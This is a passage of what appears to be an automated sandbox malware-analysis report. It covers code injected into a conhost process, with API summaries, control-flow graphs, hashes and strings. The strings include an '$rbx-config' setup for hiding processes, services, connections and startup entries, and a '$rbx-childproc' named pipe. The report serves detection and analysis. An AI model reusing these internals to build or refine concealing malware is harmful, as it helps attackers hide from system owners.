        • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction Fuzzy Hash: ECA1D63270C6824AFB20EB75F8467FD6BA6E751798F144235FED927A99DA38C442C700

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 6155920c71ca2ebb6c97a957404cbe3e020f04d01e4f924df8d1b4d97458db36
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: 6E712936714F52C5EB10DF66F8566F863A6FB88B88F405222EE8D47B68EE74C544C340

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
        • String ID: d
        • API String ID: 2005889112-2564639436
        • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction ID: 6070d05ce7a78b6cec79fc5aea522934f27cdff32950988d2ae75df2b5cb5391
        • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
        • Instruction Fuzzy Hash: 40512972618B85DAE724CF62F4493FAB7A2F788B98F444124EA8907758EF78C0498740

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
        • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
        • API String ID: 740688525-1880043860
        • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction ID: 00c971099dfa2af5f654d9f0a4da4450f70729cbfe40cd0d22d2854168fa4743
        • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
        • Instruction Fuzzy Hash: DB519B31709B4691EB25DB66F8123F92292AB48BB0F980735EEBD473D4EF38D5458640

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Running Time
        • API String ID: 1943346504-1805530042
        • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction ID: b9029fdfeaebb1a88348b3aa5e87bd8e39f2de0f11980809c975446d71cf7dba
        • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
        • Instruction Fuzzy Hash: 17319532608B4296E721DF12BA097F9A3A2F788BD5F444635EE8943A25FF3CC555C740

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$CounterInfoProcess$AllocFree
        • String ID: \GPU Engine(*)\Utilization Percentage
        • API String ID: 1943346504-3507739905
        • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction ID: 4b664cd42b913219de104dcde409d9e938acde5a05321eda99dbf70d8baf0303
        • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
        • Instruction Fuzzy Hash: 74316D32618B468AEB51DF22B989BB963A2F784F94F444235EE8A43764FF38D445C700

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 313 1fd186da22c-1fd186da294 call 1fd186db144 316 1fd186da29a-1fd186da29d 313->316 317 1fd186da6f5-1fd186da6fb call 1fd186dc388 313->317 316->317 318 1fd186da2a3-1fd186da2a9 316->318 320 1fd186da378-1fd186da38a 318->320 321 1fd186da2af-1fd186da2b3 318->321 323 1fd186da645-1fd186da649 320->323 324 1fd186da390-1fd186da394 320->324 321->320 325 1fd186da2b9-1fd186da2c4 321->325 328 1fd186da64b-1fd186da652 323->328 329 1fd186da682-1fd186da68c call 1fd186d9324 323->329 324->323 326 1fd186da39a-1fd186da3a5 324->326 325->320 327 1fd186da2ca-1fd186da2cf 325->327 326->323 331 1fd186da3ab-1fd186da3af 326->331 327->320 332 1fd186da2d5-1fd186da2df call 1fd186d9324 327->332 328->317 333 1fd186da658-1fd186da67d call 1fd186da6fc 328->333 329->317 339 1fd186da68e-1fd186da6ad call 1fd186d8070 329->339 336 1fd186da575-1fd186da581 331->336 337 1fd186da3b5-1fd186da3f0 call 1fd186d9704 331->337 332->339 347 1fd186da2e5-1fd186da310 call 1fd186d9324 * 2 call 1fd186d9a0c 332->347 333->329 336->329 340 1fd186da587-1fd186da58b 336->340 337->336 351 1fd186da3f6-1fd186da3ff 337->351 344 1fd186da59b-1fd186da5a3 340->344 345 1fd186da58d-1fd186da599 call 1fd186d99cc 340->345 344->329 350 1fd186da5a9-1fd186da5b6 call 1fd186d95a4 344->350 345->344 358 1fd186da5bc-1fd186da5c4 345->358 380 1fd186da312-1fd186da316 347->380 381 1fd186da330-1fd186da33a call 1fd186d9324 347->381 350->329 350->358 355 1fd186da403-1fd186da435 351->355 360 1fd186da43b-1fd186da447 355->360 361 1fd186da568-1fd186da56f 355->361 362 1fd186da5ca-1fd186da5ce 358->362 363 1fd186da6d8-1fd186da6f4 call 1fd186d9324 * 2 call 1fd186dc2f4 358->363 360->361 364 1fd186da44d-1fd186da46c 360->364 361->336 361->355 366 1fd186da5e1 362->366 367 1fd186da5d0-1fd186da5df call 1fd186d99cc 362->367 363->317 368 1fd186da558-1fd186da55d 364->368 369 1fd186da472-1fd186da4af call 1fd186d99e0 * 2 364->369 376 1fd186da5e3-1fd186da5ed call 1fd186db1dc 366->376 367->376 368->361 393 1fd186da4e2-1fd186da4e5 369->393 376->329 391 1fd186da5f3-1fd186da643 call 1fd186d9634 call 1fd186d9838 376->391 380->381 385 1fd186da318-1fd186da323 380->385 381->320 396 1fd186da33c-1fd186da35c call 1fd186d9324 * 2 call 1fd186db1dc 381->396 385->381 390 1fd186da325-1fd186da32a 385->390 390->317 390->381 391->329 399 1fd186da4e7-1fd186da4ee 393->399 400 1fd186da4b1-1fd186da4d7 call 1fd186d99e0 call 1fd186da96c 393->400 418 1fd186da373 396->418 419 1fd186da35e-1fd186da368 call 1fd186db2cc 396->419 404 1fd186da4f0-1fd186da4f4 399->404 405 1fd186da55f 399->405 415 1fd186da4f9-1fd186da556 call 1fd186da158 400->415 416 1fd186da4d9-1fd186da4dc 400->416 404->369 406 1fd186da564 405->406 406->361 415->406 416->393 418->320 423 1fd186da6d2-1fd186da6d7 call 1fd186dc2f4 419->423 424 1fd186da36e-1fd186da6d1 call 1fd186d8f84 call 1fd186dad28 call 1fd186d9178 419->424 423->363 424->423
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: c3f29b12cb11323441d62ebf54340846cef36deda9eeace847a71c5cef989b7f
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: 9ED1697260CB828AEB20DF65E4423FD77A2F749799F140225FAC957B9ADB38C581C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction ID: c833f3c356e7633042ce7e2d69c88d9189a25d30b0a0bfa4bcebdae77743eb7a
        • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction Fuzzy Hash: 1CD18E7260874286FB60DF65E4803FD77A6F785788F150129FE8957BAADB34C199CB00

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 434 1fd186d104c-1fd186d10b9 RegQueryInfoKeyW 435 1fd186d11b5-1fd186d11d0 434->435 436 1fd186d10bf-1fd186d10c9 434->436 436->435 437 1fd186d10cf-1fd186d111f RegEnumValueW 436->437 438 1fd186d11a5-1fd186d11af 437->438 439 1fd186d1125-1fd186d112a 437->439 438->435 438->437 439->438 440 1fd186d112c-1fd186d1135 439->440 441 1fd186d1147-1fd186d114c 440->441 442 1fd186d1137 440->442 444 1fd186d1199-1fd186d11a3 441->444 445 1fd186d114e-1fd186d1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 1fd186d113b-1fd186d113f 442->443 443->438 446 1fd186d1141-1fd186d1145 443->446 444->438 445->444 446->441 446->443
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
        • String ID: d
        • API String ID: 3743429067-2564639436
        • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction ID: 2e1f89e6b044ab31fb4021e6882f0b9b2078b424f76657dc0c4e5f991cdca685
        • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction Fuzzy Hash: 73413173218B85D6E760CF61F4457AEB7A2F388B98F448229EA8907758DF78C549CB40

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction ID: 58cec68ccc87552e091eaaeaabba7b2ad6ad878a901c7428d44c2eafc5d77b36
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 8E114932618B41C2E710CB21F4197BA7762F389BE4F940325FAA902BA8DF3CC148CB40

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 452 1fd186d7c50-1fd186d7c56 453 1fd186d7c58-1fd186d7c5b 452->453 454 1fd186d7c91-1fd186d7c9b 452->454 456 1fd186d7c85-1fd186d7cc4 call 1fd186d82f0 453->456 457 1fd186d7c5d-1fd186d7c60 453->457 455 1fd186d7db8-1fd186d7dcd 454->455 461 1fd186d7ddc-1fd186d7df6 call 1fd186d8184 455->461 462 1fd186d7dcf 455->462 474 1fd186d7cca-1fd186d7cdf call 1fd186d8184 456->474 475 1fd186d7d92 456->475 459 1fd186d7c78 __scrt_dllmain_crt_thread_attach 457->459 460 1fd186d7c62-1fd186d7c65 457->460 463 1fd186d7c7d-1fd186d7c84 459->463 465 1fd186d7c67-1fd186d7c70 460->465 466 1fd186d7c71-1fd186d7c76 call 1fd186d8234 460->466 472 1fd186d7e2b-1fd186d7e5c call 1fd186d84b0 461->472 473 1fd186d7df8-1fd186d7e29 call 1fd186d82ac call 1fd186d814c call 1fd186d8634 call 1fd186d8450 call 1fd186d8474 call 1fd186d82dc 461->473 467 1fd186d7dd1-1fd186d7ddb 462->467 466->463 484 1fd186d7e5e-1fd186d7e64 472->484 485 1fd186d7e6d-1fd186d7e73 472->485 473->467 487 1fd186d7daa-1fd186d7db7 call 1fd186d84b0 474->487 488 1fd186d7ce5-1fd186d7cf6 call 1fd186d81f4 474->488 478 1fd186d7d94-1fd186d7da9 475->478 484->485 489 1fd186d7e66-1fd186d7e68 484->489 490 1fd186d7eb5-1fd186d7ecb call 1fd186d3a1c 485->490 491 1fd186d7e75-1fd186d7e7f 485->491 487->455 504 1fd186d7cf8-1fd186d7d1c call 1fd186d85f8 call 1fd186d813c call 1fd186d8168 call 1fd186db428 488->504 505 1fd186d7d47-1fd186d7d51 call 1fd186d8450 488->505 495 1fd186d7f52-1fd186d7f5f 489->495 513 1fd186d7f03-1fd186d7f05 490->513 514 1fd186d7ecd-1fd186d7ecf 490->514 496 1fd186d7e86-1fd186d7e8c 491->496 497 1fd186d7e81-1fd186d7e84 491->497 502 1fd186d7e8e-1fd186d7e94 496->502 497->502 509 1fd186d7e9a-1fd186d7eaf call 1fd186d7c50 502->509 510 1fd186d7f48-1fd186d7f50 502->510 504->505 554 1fd186d7d1e-1fd186d7d25 __scrt_dllmain_after_initialize_c 504->554 505->475 527 1fd186d7d53-1fd186d7d5f call 1fd186d84a0 505->527 509->490 509->510 510->495 518 1fd186d7f0c-1fd186d7f21 call 1fd186d7c50 513->518 519 1fd186d7f07-1fd186d7f0a 513->519 514->513 515 1fd186d7ed1-1fd186d7ef3 call 1fd186d3a1c call 1fd186d7db8 514->515 515->513 548 1fd186d7ef5-1fd186d7efa 515->548 518->510 537 1fd186d7f23-1fd186d7f2d 518->537 519->510 519->518 544 1fd186d7d85-1fd186d7d90 527->544 545 1fd186d7d61-1fd186d7d6b call 1fd186d83b8 527->545 542 1fd186d7f34-1fd186d7f42 537->542 543 1fd186d7f2f-1fd186d7f32 537->543 549 1fd186d7f44 542->549 543->549 544->478 545->544 553 1fd186d7d6d-1fd186d7d7b 545->553 548->513 549->510 553->544 554->505 555 1fd186d7d27-1fd186d7d44 call 1fd186db3f0 554->555 555->505
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: 34db221c4c0f1798f9a68a85379843058ceab2d2f705c3cff04bd1b3f569e08c
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: A381E33060C7878AFB60EB66B8473F96293AB95784F544635FA8847797EF3CC8458702
        APIs
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: b735b32b1f6716178ab04521b22a214dc531adb1f6ac33b232243ed7e21c43dc
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: 8C81A07160C24386FB54AB26B8453F9B293BB85BC0F574135BD09477BEFA28C84DC680

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 558 1fd186d9aac-1fd186d9aea 559 1fd186d9b9e 558->559 560 1fd186d9af0-1fd186d9af3 558->560 561 1fd186d9ba0-1fd186d9bbc 559->561 560->561 562 1fd186d9af9-1fd186d9afc 560->562 563 1fd186d9b96 562->563 564 1fd186d9b02-1fd186d9b11 562->564 563->559 565 1fd186d9b13-1fd186d9b16 564->565 566 1fd186d9b1e-1fd186d9b3d LoadLibraryExW 564->566 567 1fd186d9b1c 565->567 568 1fd186d9bdd-1fd186d9bec GetProcAddress 565->568 569 1fd186d9bbd-1fd186d9bd2 566->569 570 1fd186d9b3f-1fd186d9b48 GetLastError 566->570 575 1fd186d9b89-1fd186d9b90 567->575 568->563 574 1fd186d9bee-1fd186d9bf9 568->574 569->568 573 1fd186d9bd4-1fd186d9bd7 FreeLibrary 569->573 571 1fd186d9b4a-1fd186d9b5f call 1fd186dc4d8 570->571 572 1fd186d9b77-1fd186d9b81 570->572 571->572 578 1fd186d9b61-1fd186d9b75 LoadLibraryExW 571->578 572->575 573->568 574->561 575->563 575->564 578->569 578->572
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B31
        • GetLastError.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B3F
        • LoadLibraryExW.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B69
        • FreeLibrary.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9BD7
        • GetProcAddress.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9BE3
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: 3775903223ae0254dd630df5e3474f4edae8440032e26e54aafb7e0d420811af
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 0031893121AB4691EF12DB06B8027FA23D7BB99BA0F5A0735FD994B790EF38C4448310
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
        • String ID: CONOUT$
        • API String ID: 3230265001-3130406586
        • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction ID: c11ac30b84616d8325414a174eed086a2ca02e3dc7b2aaede2d6892440df347f
        • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction Fuzzy Hash: 66118F31318B4186E750CB52F85A7B977A2F788FE4F444234EA5E87BA4EF39C9148740
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID:
        • API String ID: 1666949209-0
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: bda03f5232f3874a2593e06c0a17ce4b2d7dca494f667715eda564b2b0f83b24
        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: C0D18A36208B8985DB70DB1AF4953BA77A1F388B88F104226EACD477A9DF3DC551CB41
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: 646491faba9a53c339965c4e9ab22e3d11ee537af48d1e4fff4daaef339a75f7
